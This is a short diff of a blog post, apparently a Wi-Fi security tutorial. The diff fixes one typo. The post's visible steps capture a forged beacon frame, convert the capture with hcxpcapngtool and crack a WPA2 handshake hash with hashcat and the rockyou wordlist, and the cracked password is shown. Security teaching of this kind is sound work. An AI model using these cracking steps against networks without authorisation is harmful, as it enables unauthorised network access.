thexerocouk/thexerocouk.github.io/_posts/2025-06-14-hidden-wifi.md

 With Wireshark open and listening capture the forged Beacon frame as shown below:
 ![Forged Beacon Frame](/images/forged_beacon.webp)

-Now all you need to do in merge the forged beacon frame into the existing pcapng file and convert the hash to hashcat using hcxpcapngtool.
+Now all you need to do is merge the forged beacon frame into the existing pcapng file and convert the hash to hashcat using hcxpcapngtool.
 And finally, its now time to crack the hash using hashcat
 ```# hashcat -m 22000 forged.22000 /usr/share/wordlists/rockyou.txt --quiet
 8761551efb7b088761cdcf31de358919:50d4f7ffefd8:0025d38b6d09:WPA2:princess
 ```